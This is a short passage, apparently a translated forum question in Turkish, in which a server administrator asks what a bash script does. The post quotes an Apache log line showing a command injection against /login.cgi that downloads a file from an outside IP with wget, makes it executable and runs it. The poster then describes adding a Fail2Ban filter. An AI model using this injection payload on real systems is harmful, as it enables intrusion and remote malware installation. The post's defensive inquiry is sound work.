2
Bu bash betiği ne işe yarıyor? [Hack Girişimi]
Son zamanlarda aşağıdaki tuhaf satırları sunucularımın apache günlüklerinde fark ettim: 156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0" Bu yüzden özel bir Fail2Ban filtresi yaptım ve bu /login.cgi URL'lerini isteyen IP'leri yasaklamaya başladım. Ama ne yapmaya çalıştıklarını merak ediyordum, bu yüzden yürütmeye çalıştıkları senaryoyu çektim ve …